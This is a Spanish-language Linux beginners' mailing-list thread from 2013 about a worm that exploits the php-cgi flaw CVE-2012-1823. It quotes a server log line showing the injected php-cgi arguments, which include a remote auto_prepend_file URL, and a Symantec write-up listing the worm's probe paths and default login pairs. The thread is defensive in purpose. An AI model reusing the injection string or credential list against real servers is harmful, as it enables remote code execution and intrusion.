[Lugro-principiantes] Nuevo gusano que afecta GNU/Linux

Omar Arino omar.arino en linuxdojo.com.ar
Mie Dic 4 11:07:54 ART 2013 

El 4 de diciembre de 2013 11:04, Omar
Arino<omar.arino en linuxdojo.com.ar>escribió:

>
>
> El 4 de diciembre de 2013 10:36, Sacanti Ernesto<sacanti.ernesto en gmail.com
> > escribió:
>
> El 03/12/13 23:50, Martín Carr escribió:
>>
>>  2013/12/3, E S<micta2003 en yahoo.com>:
>>>
>>>> Estimados
>>>>
>>>> No me queda claro como me puede afectar este gusano. Tengo LinuxMint 15
>>>> y
>>>> soy un usuario comun. Esas recomendaciones son para redes?
>>>>
>>>
>>> Salvo que uses tu computadora como un servidor web (para alojar
>>> páginas dinámicas que usan el lenguaje PHP) y no la hayas actualizado,
>>> no tenés que preocuparte.
>>>
>>> Saludos!
>>>
>>>  No se si sera esto, pero encontre en mi servidor este log:
>> /usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d
>> suhosin.simulation=on -d disable_functions=\"\" -d open_basedir=none -d
>> auto_prepend_file=http://82.221.102.181/robots.txt -d
>> cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
>>
>>
Te paso mas datos:



>  *Discovered:* November 26, 2013*Updated:*November 28, 2013 12:43:59 AM
> *Type:*Worm*Infection Length:* Varies*Systems Affected:*Linux *CVE
> References:*CVE-2012-1823<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>
> , CVE-2012-2311<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2311>
> , CVE-2012-2335<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335>
> , CVE-2012-2336<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336>
> The worm propagates by exploiting the PHP 'php-cgi' Information
> Disclosure Vulnerability <http://www.securityfocus.com/bid/53388> (CVE-2012-1823)
> through http POST requests.
>
> If the target is vulnerable, it downloads and executes the worm from the
> following URL:
> [http://]www.gpharma.co
>
> When the worm is executed, it copies itself as the following file:
> /tmp/x86
>
> The worm creates the following directory:
> /var/run/.zollard/
>
> The worm attempts to force load ip_table or iptable from the following
> locations:
>
>    - /lib/modules/[OS VERSION]/kernel/net/ipv4/netfilter/ip_tables.ko
>    - /lib/modules/[OS VERSION]/kernel/net/ipv4/netfilter/iptable_filter.ko
>
>
> The worm configures iptable to drop packets on TCP port 23 and prevents
> remote users from connecting to the compromised computer.
>
> The worm attempts to terminate the following process:
> telnetd
>
> The worm attempts to terminate the following processes and delete the
> files:
>
>    - /var/run/.lightpid
>    - /var/run/.aidrapid
>    - /var/run/lightpid
>
>
> The worm deletes the following files:
>
>    - /var/run/.lightscan
>    - /var/run/lightscan
>    - /var/run/mipsel
>    - /var/run/mips
>    - /var/run/sh
>    - /var/run/arm
>    - /var/run/ppc
>    - /var/run/m
>    - /var/run/mi
>    - /var/run/s
>    - /var/run/a
>    - /var/run/p
>    - /var/run/msx
>    - /var/run/mx
>    - /var/run/sx
>    - /var/run/ax
>    - /var/run/px
>    - /var/run/32
>    - /var/run/sel
>    - /var/run/pid
>    - /var/run/gcc
>    - /var/run/dev
>    - /var/run/psx
>    - /var/run/mpl
>    - /var/run/mps
>    - /var/run/sph
>    - /var/run/arml
>    - /var/run/mips.l
>    - /var/run/mipsell
>    - /var/run/ppcl
>    - /var/run/shl
>    - /bin/pp
>    - /bin/mi
>    - /bin/mii
>    - /var/tmp/dreams.install.sh
>    - /var/tmp/ep2.ppc
>    - /usr/bin/wget
>    - /usr/bin/-wget
>
>
> The worm generates random IP addresses excluding the following:
>
>    - 0.0.0.0 - 0.255.255.255
>    - 127.0.0.1 - 127.255.255.255
>    - 192.0.2.0 - 192.0.2.255
>    - 198.51.100.0 - 198.51.100.255
>    - 203.0.113.0 - 203.0.113.255
>    - 255.255.255.255
>
>
> If an IP address is reachable, the worm attempts to access the following
> paths:
>
>    - /cgi-bin/php
>    - /cgi-bin/php5
>    - /cgi-bin/php-cgi
>    - /cgi-bin/php.cgi
>    - /cgi-bin/php4
>
>
> If user authentication is required, the worm attempts the following user
> name and password combinations (user name/password):
>
>    - admin/admin
>    - root/[BLANK]
>    - root/root
>    - admin/1234
>    - admin/12345
>    - root/admin
>    - root/dreambox
>    - admin/smcadmin
>    - admin/[BLANK]
>
>
>
> Recommendations
>
> Symantec Security Response encourages all users and administrators to
> adhere to the following basic security "best practices":
>
>    - Use a firewall to block all incoming connections from the Internet
>    to services that should not be publicly available. By default, you should
>    deny all incoming connections and only allow services you explicitly want
>    to offer to the outside world.
>    - Enforce a password policy. Complex passwords make it difficult to
>    crack password files on compromised computers. This helps to prevent or
>    limit damage when a computer is compromised.
>    - Ensure that programs and users of the computer use the lowest level
>    of privileges necessary to complete a task. When prompted for a root or UAC
>    password, ensure that the program asking for administration-level access is
>    a legitimate application.
>    - Disable AutoPlay to prevent the automatic launching of executable
>    files on network and removable drives, and disconnect the drives when not
>    required. If write access is not required, enable read-only mode if the
>    option is available.
>    - Turn off file sharing if not needed. If file sharing is required,
>    use ACLs and password protection to limit access. Disable anonymous access
>    to shared folders. Grant access only to user accounts with strong passwords
>    to folders that must be shared.
>    - Turn off and remove unnecessary services. By default, many operating
>    systems install auxiliary services that are not critical. These services
>    are avenues of attack. If they are removed, threats have less avenues of
>    attack.
>    - If a threat exploits one or more network services, disable, or block
>    access to, those services until a patch is applied.
>    - Always keep your patch levels up-to-date, especially on computers
>    that host public services and are accessible through the firewall, such as
>    HTTP, FTP, mail, and DNS services.
>    - Configure your email server to block or remove email that contains
>    file attachments that are commonly used to spread threats, such as .vbs,
>    .bat, .exe, .pif and .scr files.
>    - Isolate compromised computers quickly to prevent threats from
>    spreading further. Perform a forensic analysis and restore the computers
>    using trusted media.
>    - Train employees not to open attachments unless they are expecting
>    them. Also, do not execute software that is downloaded from the Internet
>    unless it has been scanned for viruses. Simply visiting a compromised Web
>    site can cause infection if certain browser vulnerabilities are not patched.
>    - If Bluetooth is not required for mobile devices, it should be turned
>    off. If you require its use, ensure that the device's visibility is set to
>    "Hidden" so that it cannot be scanned by other Bluetooth devices. If device
>    pairing must be used, ensure that all devices are set to "Unauthorized",
>    requiring authorization for each connection request. Do not accept
>    applications that are unsigned or sent from unknown sources.
>    - For further information on the terms used in this document, please
>    refer to the Security Response glossary<http://www.symantec.com/business/security_response/glossary.jsp>
>    .
>
> *Writeup By: *Kaoru Hayashi
>
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://lugro.org.ar/pipermail/lugro-principiantes/attachments/20131204/00cba6a1/attachment-0001.htm>

Más información sobre la lista de distribución Lugro-principiantes